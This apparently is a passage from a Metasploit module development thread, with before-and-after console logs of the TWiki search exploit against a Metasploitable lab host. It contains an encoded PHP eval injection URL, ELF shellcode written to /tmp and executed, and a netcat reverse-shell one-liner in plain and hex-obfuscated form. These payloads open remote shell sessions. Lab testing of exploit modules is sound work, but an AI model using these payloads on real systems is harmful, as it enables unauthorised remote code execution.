msf exploit(unix/webapp/twiki_search) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[+] Successfully sent exploit request
[*] Exploit completed, but no session was created.
msf exploit(unix/webapp/twiki_search) >

> msfadmin@metasploitable:~$ tail -f /var/log/apache2/*.log
> ==> /var/log/apache2/access.log <==
> 10.0.0.1 - - [09/Feb/2026:07:32:33 -0500] "GET /twiki/bin/view/Main/WebSearch?search=4k7zppn%27%3becho%24%7bIFS%7d\\%3c\\%3fphp\\%24%7bIFS%7deval\\%28gzuncompress\\%28base64_decode\\%28\\%27eNqVU/1v2jAQ/Ve8KKodxPho6bRC0caqbprG2mnwW1NZ%2bbiARepEsTNSIf73nfNRYC1qB0LEd%2b/ee%2bfLdVuXn9JlSrqtVpdAliUZzyBNMi3kgvWcEbFFSsaE9nsd8%2b1TjJg0xgb4GREREcbsyGCUzsB74CoJVqB5EAuQmjrk5IQIxQMvjj0/BsQ6DtkQW2GJHTFLB%2bmw292gzna4Kbm3ltFVXD%2bmsONF5W2p9g5LkbMWjYxckoJ8VQkV2pX5/6BvmkGIhlclJl/595vreZvMbq9%2b8Nn89/XkpzlM%2bfzql1HNwCA/N6yJlBBoZqs2OXBX%2bUCwIQ8FMMe42/dcEux7LlMNnMqEVBAS5TJQ1NlDPgdVaTsfW25xMcBfzy3go1sE527x4dQt%2bhg7u8BY3y0ijIcm7%2bN/hFiMnWPuFM9nfWtE1FroYIn3t7MUeAqe7nlIonUmNFRd5yjtY3w1alCVo2Ftjb%2bM3b5Bxo5B4l1FeAxLgsFRrRpaS75U0NweAg9n4mFdLlMvWDHrBrNWu2Qzw65Ibe%2bO4hO9x4hvZodTWy9FDIShVcww23fIJWmo39CYTzr7fZnK9zuu412Wdf82ebR6a9r7Nr39MpnO7uiDWphKem9aUqPnmdJtnS6fq9cYCg1SiUTyOPFCCBlV%2bTJRotlXKfgC9FO0AwUEuU6yTiiUWTEOf7yY1ltWYbj/mHpKjaul5OYN1yjAKMVu/HK5D4DVpCDGy9gQQ8dK1Lae4l/EjYvp\\%27\\%29\\%29\\%29\\%3b\\%24%7bIFS%7d\\%3f\\%3e%7cexec%24%7bIFS%7dphp%3b%23%27 HTTP/1.1" 200 4872 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"




msf exploit(unix/webapp/twiki_search) > check
[*] Attempting to create /twiki/bin/view/Main/pNFUHH3SKmZt ...
[*] 10.0.0.10:80 - The target is not exploitable.
msf exploit(unix/webapp/twiki_search) >

> msfadmin@metasploitable:~$ tail -f /var/log/apache2/*.log
> ==> /var/log/apache2/access.log <==
> 10.0.0.1 - - [09/Feb/2026:07:32:44 -0500] "GET /twiki/bin/view/Main/pNFUHH3SKmZt HTTP/1.1" 200 4892 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
> 10.0.0.1 - - [09/Feb/2026:07:32:44 -0500] "GET /twiki/bin/view/Main/WebSearch?search=99%27%3becho%24%7bIFS%7dnavEXlLsQuS1BVLQA2%24%7bIFS%7d%3epNFUHH3SKmZt.txt%3b%23%27 HTTP/1.1" 200 4872 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
> 10.0.0.1 - - [09/Feb/2026:07:32:44 -0500] "GET /twiki/bin/view/Main/pNFUHH3SKmZt HTTP/1.1" 200 4892 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
```

### After

```console
$ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use unix/webapp/twiki_search; options; show targets'
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
[*] Using configured payload linux/x86/meterpreter/reverse_tcp

Module options (exploit/unix/webapp/twiki_search):

   Name         Current Setting            Required  Description
   ----         ---------------            --------  -----------
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
   RHOSTS       10.0.0.10                  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        80                         yes       The target port (TCP)
   SEARCH_PATH  /search/Main/SearchResult  yes       TWiki search directory path
   SSL          false                      no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                 no        Path to a custom SSL certificate (default is randomly generated)
   URI          /twiki/bin                 yes       TWiki bin directory path
   URIPATH                                 no        The URI to use for this exploit (default is random)
   VHOST                                   no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tap0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Automatic (Linux Dropper)



View the full module info with the info, or info -d command.


Exploit targets:
=================

    Id  Name
    --  ----
    0   Automatic (Unix Command)
=>  1   Automatic (Linux Dropper)


msf exploit(unix/webapp/twiki_search) >
msf exploit(unix/webapp/twiki_search) > check
[*] URI: /twiki/bin/search/Main/SearchResult?search=
[*] Attempting to create: /twiki/bin/view/Main/1l1Nnv4rIiv
[*] Checking if created: /twiki/bin/view/Main/1l1Nnv4rIiv
[*] Attempting to delete: /twiki/bin/view/Main/1l1Nnv4rIiv
[+] 10.0.0.10:80 - The target is vulnerable.
msf exploit(unix/webapp/twiki_search) >
msf exploit(unix/webapp/twiki_search) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Executing Automatic (Linux Dropper) for linux/x86/meterpreter/reverse_tcp
[*] Generated command stager: ["echo -en \\\\x7f\\\\x45\\\\x4c\\\\x46\\\\x01\\\\x01\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\x00\\\\x03\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x54\\\\x80\\\\x04\\\\x08\\\\x34\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x34\\\\x00\\\\x20\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x04\\\\x08\\\\x00\\\\x80\\\\x04\\\\x08\\\\xeb\\\\x00\\\\x00\\\\x00\\\\x82\\\\x01\\\\x00\\\\x00\\\\x07\\\\x00\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x6a\\\\x02\\\\x58\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x74\\\\x06\\\\x31\\\\xc0\\\\xb0\\\\x01\\\\xcd\\\\x80\\\\xb0\\\\x42\\\\xcd\\\\x80\\\\x6a\\\\x02\\\\x58\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x75\\\\xed\\\\x6a\\\\x0a\\\\x5e\\\\x31\\\\xdb\\\\xf7\\\\xe3\\\\x53\\\\x43\\\\x53\\\\x6a\\\\x02\\\\xb0\\\\x66\\\\x89\\\\xe1\\\\xcd\\\\x80\\\\x97\\\\x5b\\\\x68\\\\x0a\\\\x00\\\\x00\\\\x01\\\\x68\\\\x02\\\\x00\\\\x11\\\\x5c\\\\x89\\\\xe1\\\\x6a\\\\x66\\\\x58\\\\x50\\\\x51\\\\x57\\\\x89\\\\xe1\\\\x43\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x79\\\\x19\\\\x4e\\\\x74\\\\x3d\\\\x68\\\\xa2\\\\x00\\\\x00\\\\x00\\\\x58\\\\x6a\\\\x00\\\\x6a\\\\x05\\\\x89\\\\xe3\\\\x31\\\\xc9\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x79\\\\xbd\\\\xeb\\\\x27\\\\xb2\\\\x07\\\\xb9\\\\x00\\\\x10\\\\x00\\\\x00\\\\x89\\\\xe3\\\\xc1\\\\xeb\\\\x0c\\\\xc1\\\\xe3\\\\x0c\\\\xb0\\\\x7d\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x78\\\\x10\\\\x5b\\\\x89\\\\xe1\\\\x99\\\\xb2\\\\x66\\\\xb0\\\\x03\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x78\\\\x02\\\\xff\\\\xe1\\\\xb8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xbb\\\\x01\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80>>/tmp/doHKW ; chmod 777 /tmp/doHKW ; /tmp/doHKW ; rm -f /tmp/doHKW"]
[*] Executing command: echo -en \\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00\\x00\\x54\\x80\\x04\\x08\\x34\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\x00\\x20\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x04\\x08\\x00\\x80\\x04\\x08\\xeb\\x00\\x00\\x00\\x82\\x01\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x6a\\x02\\x58\\xcd\\x80\\x85\\xc0\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\\xb0\\x42\\xcd\\x80\\x6a\\x02\\x58\\xcd\\x80\\x85\\xc0\\x75\\xed\\x6a\\x0a\\x5e\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\xb0\\x66\\x89\\xe1\\xcd\\x80\\x97\\x5b\\x68\\x0a\\x00\\x00\\x01\\x68\\x02\\x00\\x11\\x5c\\x89\\xe1\\x6a\\x66\\x58\\x50\\x51\\x57\\x89\\xe1\\x43\\xcd\\x80\\x85\\xc0\\x79\\x19\\x4e\\x74\\x3d\\x68\\xa2\\x00\\x00\\x00\\x58\\x6a\\x00\\x6a\\x05\\x89\\xe3\\x31\\xc9\\xcd\\x80\\x85\\xc0\\x79\\xbd\\xeb\\x27\\xb2\\x07\\xb9\\x00\\x10\\x00\\x00\\x89\\xe3\\xc1\\xeb\\x0c\\xc1\\xe3\\x0c\\xb0\\x7d\\xcd\\x80\\x85\\xc0\\x78\\x10\\x5b\\x89\\xe1\\x99\\xb2\\x66\\xb0\\x03\\xcd\\x80\\x85\\xc0\\x78\\x02\\xff\\xe1\\xb8\\x01\\x00\\x00\\x00\\xbb\\x01\\x00\\x00\\x00\\xcd\\x80>>/tmp/doHKW ; chmod 777 /tmp/doHKW ; /tmp/doHKW ; rm -f /tmp/doHKW
[*] URI: /twiki/bin/search/Main/SearchResult?search=
[*] Using platform payload (will perform base64 encoding)
[*] Sending payload
[*] Transmitting intermediate stager...(102 bytes)
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Payload sent
[+] Exploit complete
[*] Command Stager progress - 100.00% done (1251/1251 bytes)
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:50226) at 2026-02-09 16:50:23 +0000

meterpreter >
meterpreter > shell
Process 6573 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^Z
Background channel 1? [y/N]  y
meterpreter > background
[*] Backgrounding session 1...
msf exploit(unix/webapp/twiki_search) >
msf exploit(unix/webapp/twiki_search) > set TARGET 0
target => 0
msf exploit(unix/webapp/twiki_search) >
msf exploit(unix/webapp/twiki_search) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Automatic (Unix Command)
    1   Automatic (Linux Dropper)


msf exploit(unix/webapp/twiki_search) >
msf exploit(unix/webapp/twiki_search) > run
[+] mkfifo /tmp/gslcv; nc 10.0.0.1 4444 0</tmp/gslcv | /bin/sh >/tmp/gslcv 2>&1; rm /tmp/gslcv
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Executing Automatic (Unix Command) for cmd/unix/reverse_netcat
[*] Executing command: /bin/echo${IFS}-ne${IFS}'\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x61\x63\x63\x79\x3b\x20\x6e\x63\x20\x31\x30\x2e\x30\x2e\x30\x2e\x31\x20\x34\x34\x34\x34\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x61\x63\x63\x79\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70\x2f\x61\x63\x63\x79\x20\x32\x3e\x26\x31\x3b\x20\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x61\x63\x63\x79'|sh
[*] URI: /twiki/bin/search/Main/SearchResult?search=
[*] Using command-based payload
[*] Sending payload
[*] Command shell session 2 opened (10.0.0.1:4444 -> 10.0.0.10:50227) at 2026-02-09 16:50:50 +0000
[*] Payload sent
[-] Exploit aborted due to failure: unknown: Error sending exploit request
[*] Exploit completed, but no session was created.
msf exploit(unix/webapp/twiki_search) >
msf exploit(unix/webapp/twiki_search) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                            Connection
  --  ----  ----                   -----------                            ----------
  1         meterpreter x86/linux  www-data @ metasploitable.localdomain  10.0.0.1:4444 -> 10.0.0.10:50226 (10.0.0.10)
  2         shell cmd/unix                                                10.0.0.1:4444 -> 10.0.0.10:50227 (10.0.0.10)

msf exploit(unix/webapp/twiki_search) >
msf exploit(unix/webapp/twiki_search) > sessions -i 2
[*] Starting interaction with 2...

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

_...Hoping someone better than me knows what to tweak in order to make `TARGET 0 (Unix Command)` 100% happy!_
